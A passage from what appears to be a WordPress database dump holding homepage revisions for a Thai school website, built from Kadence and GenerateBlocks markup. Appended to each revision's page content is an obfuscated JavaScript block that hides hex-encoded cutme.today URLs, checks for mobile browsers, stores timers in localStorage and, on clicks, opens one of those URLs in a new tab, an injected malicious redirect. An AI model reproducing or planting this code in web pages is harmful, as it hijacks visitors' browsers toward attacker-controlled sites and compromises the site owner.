_0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:31:43','2024-07-27 03:31:43','',14,'http://pakhaeng.ssk.in.th/?p=31',0,'revision','',0),
(32,1,'2024-07-27 10:34:46','2024-07-27 03:34:46','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:34:46','2024-07-27 03:34:46','',14,'http://pakhaeng.ssk.in.th/?p=32',0,'revision','',0),
(34,1,'2024-07-27 10:35:27','2024-07-27 03:35:27','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploa